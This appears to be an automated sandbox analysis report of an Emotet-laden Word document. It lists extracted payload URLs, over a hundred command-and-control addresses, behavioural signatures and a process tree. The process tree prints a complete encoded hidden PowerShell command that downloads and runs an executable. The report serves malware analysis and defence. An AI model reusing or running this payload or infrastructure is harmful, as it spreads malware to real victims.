Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
19-12-2019 13:18
General
Malware Config
Extracted
https://siberiankatalog.com/wp-admin/ntaan872/
http://profitcoach.net/wp-includes/5s419/
https://alwatania-co.com/cgi-bin/b38983/
https://www.icelp.info/wp-includes/uzxgqpu52588/
http://registro.mibebeyyo.com/application/gbvwde29/
Extracted
emotet
63.248.198.8:80
189.19.81.181:443
130.204.247.253:80
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
51.255.165.160:8080
118.36.70.245:80
190.210.184.138:995
188.135.15.49:80
139.162.118.88:8080
72.29.55.174:80
68.183.170.114:8080
181.231.62.54:80
192.241.146.84:8080
71.76.45.83:443
63.246.252.234:80
37.211.49.127:80
74.59.187.94:80
5.88.27.67:8080
91.74.175.46:80
81.157.234.90:8080
87.106.77.40:7080
76.221.133.146:80
82.36.103.14:80
201.213.32.59:80
86.42.166.147:80
113.61.76.239:80
183.99.239.141:80
142.127.57.63:8080
45.8.136.201:80
79.7.114.1:80
83.248.141.198:80
50.28.51.143:8080
93.148.252.90:80
185.86.148.222:8080
203.130.0.69:80
45.79.95.107:443
96.38.234.10:80
223.255.148.134:80
96.61.113.203:80
2.45.112.134:80
200.124.225.32:80
149.135.123.65:80
87.106.46.107:8080
82.8.232.51:80
195.223.215.190:80
190.195.129.227:8090
68.129.203.162:443
159.203.204.126:8080
62.75.143.100:7080
37.120.185.153:443
93.67.154.252:443
74.79.103.55:80
37.183.121.32:80
68.174.15.223:80
91.204.163.19:8090
77.55.211.77:8080
138.68.106.4:7080
109.169.86.13:8080
45.50.177.164:80
186.15.83.52:8080
200.119.11.118:443
73.60.8.210:80
111.125.71.22:8080
217.199.160.224:8080
82.196.15.205:8080
62.75.160.178:8080
190.186.164.23:80
151.237.36.220:80
85.152.208.146:80
178.79.163.131:8080
46.101.212.195:8080
46.28.111.142:7080
5.196.35.138:7080
119.59.124.163:8080
144.139.56.105:80
191.103.76.34:443
14.160.93.230:80
94.200.114.162:80
204.63.252.182:443
68.183.190.199:8080
77.27.221.24:443
190.97.30.167:990
149.62.173.247:8080
190.100.153.162:443
181.36.42.205:443
116.48.148.32:80
190.6.193.152:8080
181.135.153.203:443
83.165.78.227:80
188.216.24.204:80
91.83.93.124:7080
2.139.158.136:443
112.218.134.227:80
91.117.83.59:80
185.160.212.3:80
181.61.143.177:80
91.205.215.57:7080
181.198.203.45:443
104.131.58.132:8080
212.237.50.61:8080
80.11.158.65:8080
212.71.237.140:8080
69.163.33.84:8080
116.48.138.115:80
186.68.48.204:443
2.42.173.240:80
219.75.66.103:80
142.93.114.137:8080
152.170.108.99:443
200.58.83.179:80
5.32.41.106:80
97.81.12.153:80
207.154.204.40:8080
24.100.130.206:80
2.44.167.52:80
203.25.159.3:8080
190.146.131.105:8080
163.172.40.218:7080
125.99.61.162:7080
99.252.27.6:80
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4608 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4608 1988 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4608 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe282.exedescription pid process target process PID 4608 wrote to memory of 3744 4608 Powershell.exe 282.exe PID 3744 wrote to memory of 4192 3744 282.exe 282.exe -
Executes dropped EXE 2 IoCs
Processes:
282.exe282.exepid process 3744 282.exe 4192 282.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
282.exepid process 4192 282.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4956 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE282.exe282.exepid process 4956 WINWORD.EXE 3744 282.exe 4192 282.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4956 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1612cd9b94f1c335969ff73c085dceadf11615bc296caea41c9628fbab30d5e2.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABVAHoAagBhAGMAZwByAHUAdQA9ACcAUgBsAHYAZgB4AHcAYgB2AHUAawBoAGkAJwA7ACQAQQBuAHkAcgB4AHkAcwBkAGoAbABqAG0AIAA9ACAAJwAyADgAMgAnADsAJABaAHEAYgBzAHoAaQBkAHEAaAB6AHgAcAA9ACcAQQBnAHQAbgB4AGYAbgB4AHgAJwA7ACQARABpAHUAYwB5AGIAeQBnAHAAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQQBuAHkAcgB4AHkAcwBkAGoAbABqAG0AKwAnAC4AZQB4AGUAJwA7ACQASAByAGUAdwBuAHEAYwBmAGsAZwBhAD0AJwBNAGwAbwB1AG8AZwB6AGgAJwA7ACQAUgBoAHEAaABuAHgAYQBzAGwAPQAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBsAGkAZQBuAFQAOwAkAEYAaQByAHQAeQBsAGYAeQB1AG8AdQA9ACcAaAB0AHQAcABzADoALwAvAHMAaQBiAGUAcgBpAGEAbgBrAGEAdABhAGwAbwBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHQAYQBhAG4AOAA3ADIALwAqAGgAdAB0AHAAOgAvAC8AcAByAG8AZgBpAHQAYwBvAGEAYwBoAC4AbgBlAHQALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA1AHMANAAxADkALwAqAGgAdAB0AHAAcwA6AC8ALwBhAGwAdwBhAHQAYQBuAGkAYQAtAGMAbwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGIAMwA4ADkAOAAzAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBpAGMAZQBsAHAALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AdQB6AHgAZwBxAHAAdQA1ADIANQA4ADgALwAqAGgAdAB0AHAAOgAvAC8AcgBlAGcAaQBzAHQAcgBvAC4AbQBpAGIAZQBiAGUAeQB5AG8ALgBjAG8AbQAvAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGcAYgB2AHcAZABlADIAOQAvACcALgAiAFMAYABwAGwASQBUACIAKAAnACoAJwApADsAJABVAGUAbgB1AGoAcABmAGMAdABwAGUAPQAnAFkAdAB0AGkAdgBrAGIAeQB6AG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBkAG0AcQBnAG0AbAB2AGcAegByAHIAcwAgAGkAbgAgACQARgBpAHIAdAB5AGwAZgB5AHUAbwB1ACkAewB0AHIAeQB7ACQAUgBoAHEAaABuAHgAYQBzAGwALgAiAEQATwBXAGAATgBsAG8AYABBAEQARgBJAGAAbABlACIAKAAkAEUAZABtAHEAZwBtAGwAdgBnAHoAcgByAHMALAAgACQARABpAHUAYwB5AGIAeQBnAHAAbwApADsAJABRAHQAaQBxAG0AZwByAGIAawBzAD0AJwBTAHEAZQBlAGgAZAB4AHUAdQBwAGEAdgB5ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQARABpAHUAYwB5AGIAeQBnAHAAbwApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAyADkAOQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABhAGAAUgB0ACIAKAAkAEQAaQB1AGMAeQBiAHkAZwBwAG8AKQA7ACQAUgB1AHIAdwB0AHgAeQBtAHUAYwBjAD0AJwBQAG8AYgB1AG0AYwB0AHgAJwA7AGIAcgBlAGEAawA7ACQASQB1AGcAcgBiAHMAbgBzAGkAagBjAGoAPQAnAEQAYwB2AHMAcgBqAGUAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGIAeQBiAG0AYgBkAHIAeABjAGkAYgA9ACcAWAB0AGgAawB0AG4AeABmAHkAJwA=1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\282.exe"C:\Users\Admin\282.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\282.exe--fdf7f48a3⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\282.exe
-
C:\Users\Admin\282.exe
-
C:\Users\Admin\282.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/3744-11-0x0000000002240000-0x0000000002257000-memory.dmpFilesize
92KB
-
memory/4192-14-0x0000000002100000-0x0000000002117000-memory.dmpFilesize
92KB
-
memory/4192-15-0x0000000000400000-0x0000000000452000-memory.dmpFilesize
328KB